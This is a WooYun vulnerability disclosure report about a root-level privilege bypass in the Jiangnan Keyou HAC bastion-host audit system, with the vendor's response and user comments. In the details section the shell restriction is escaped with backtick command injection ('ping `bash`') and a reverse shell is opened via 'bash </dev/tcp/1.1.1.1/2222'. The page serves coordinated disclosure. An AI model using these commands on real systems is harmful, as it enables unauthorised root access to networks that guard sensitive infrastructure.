当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028617

漏洞标题:江南科友运维审计系统可Root

相关厂商:江南科友

漏洞作者: 小熊饼干

提交时间:2013-07-12 10:41

修复时间:2013-10-10 10:42

公开时间:2013-10-10 10:42

漏洞类型:权限控制绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-12: 细节已通知厂商并且等待厂商处理中
2013-07-16: 厂商已经确认,细节仅向厂商公开
2013-07-19: 细节向第三方安全合作伙伴开放
2013-09-09: 细节向核心白帽子及相关领域专家公开
2013-09-19: 细节向普通白帽子公开
2013-09-29: 细节向实习白帽子公开
2013-10-10: 细节向公众公开

简要描述:

江南科友hac运维审计系统是一款用于审计的堡垒主机系统,属于内网安全非常重要的系统,且其自称服务于银行、证券、电力、医疗等诸多行业,一些常见的银行,交通银行、民生银行等等等就采用其服务;但是这个设备存在严重漏洞,可直接获取root权限。。

详细说明:

江南科友hac运维审计系统,下称HAC。
有次正好有机会摸到了这个NB闪闪的东西,一时兴起,就测了下其SSH shell的安全性。
使用一个普通用户SSH登录HAC后,shell做了较严格限制,发现只能执行echo / ssh / ping 命令(具体忘掉是哪几个了,没注意...),无任何其他命令。
我勒个去,好nb的样子,貌似没啥漏洞。
就在要放弃的时候,输入了个
ping `bash`,突然就成功获得了一个bash,如下图:

1.png


貌似有戏了,不过执行了各种强大的命令,如ls,pwd,都不见有输出,也没有报错(如命令不存在,无权限执行),看起来很奇怪的样子...
直觉是命令可以执行,但是把命令的输出都给重定向了,真是坑爹...
不过没关系,我们有下面这个NB闪闪的命令
bash </dev/tcp/1.1.1.1/2222
竟然真的得到了一个shell,而且竟然直接就是root shell...太尼玛顺利了吧...
赶紧ps下看看:

2.png


顺便看了下之前一直读不到的/etc/passwd:

3.png


hacuser 的uid/gid竟然都是0...
结合图2 pts/1 对应的进程树,看来普通用户登录进来就是root权限,只不过可执行的没几个命令...
ps 了一下,看了都有啥进程,发现更亮的东西在下面,请保护好眼睛:

4.png


5.png


我沉思了好久,始终不知道如何才能把.exe文件弄到linux上运行...
好吧,就写到这吧,root都有了,该干啥干啥去了

漏洞证明:

修复方案:

NB厂商自己好好琢磨琢磨吧

版权声明:转载请注明来源 小熊饼干@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-07-16 22:57

厂商回复:

至16日,暂未能找到实例或本地案例进行复现(注:由于不具有该设备,CNVD已经在协调多方进行验证)。先行根据图片按通用软硬件漏洞进行确认,在未能及时复现的情况下,将转发给厂商,由其确认并处置。该系统多部署在内部网络,因此远程危害性稍微小一些。
rank 20

最新状态:

2013-07-24:转发江南科友厂商的回复意见:在对漏洞原理进行准确定位后,我司组织开发人员与安全工程师立即展开相关的修补加固工作,针对该漏洞,开发针对性的修补包,严格限制用户的输入输出,并在所有版本上进行测试,确保修补包的有效性、安全性、稳定性。修补包的工作将在本周内完成。我司后续工作计划如下:1、 向存在该漏洞的用户主动发送漏洞公告和提供升级补丁包,并协助用户完成该漏洞的修补工作;2、 启动对系统内嵌的开源软件及操作环境的全面渗透分析工作,并在安全设计、编码等各阶段,对存在的安全问题进行梳理,防范可能存在的安全风险;3、 充分利用第三方资源,引入外部可靠性测试与安全性检测,提升产品的质量。谨此,我司真诚对“小熊饼干”及www.wooyun.org致以谢意。


漏洞评价:

评论

  1. 2013-07-12 11:20 | springemp ( 路人 | Rank:20 漏洞数:4 | 打酱油~偶尔买点盐~)

    哎呀,堡垒机啊,卤煮NB了~

  2. 2013-07-12 15:07 | 洛丽潞丽 ( 路人 | Rank:22 漏洞数:4 | 专注殴打GOV30年)

    是新版还是旧版的?

  3. 2013-08-27 17:17 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    我能说很喜欢厂商的跟进嘛!

  4. 2013-10-10 20:50 | at0xm ( 路人 | Rank:16 漏洞数:2 | I love Chao)

    首先以普通权限进入hac。这一步之前你怎么省略了。只能说在linux下可以执行文件只要有x权限就行了。叫“我去年买个表.dll”都可以

  5. 2014-01-24 17:36 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    居然不下源码来

  6. 2014-02-18 21:16 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    哈哈

  7. 2014-03-27 15:31 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    exe是怎么在linux上运行的呢?我陷入了深深地沉思。。。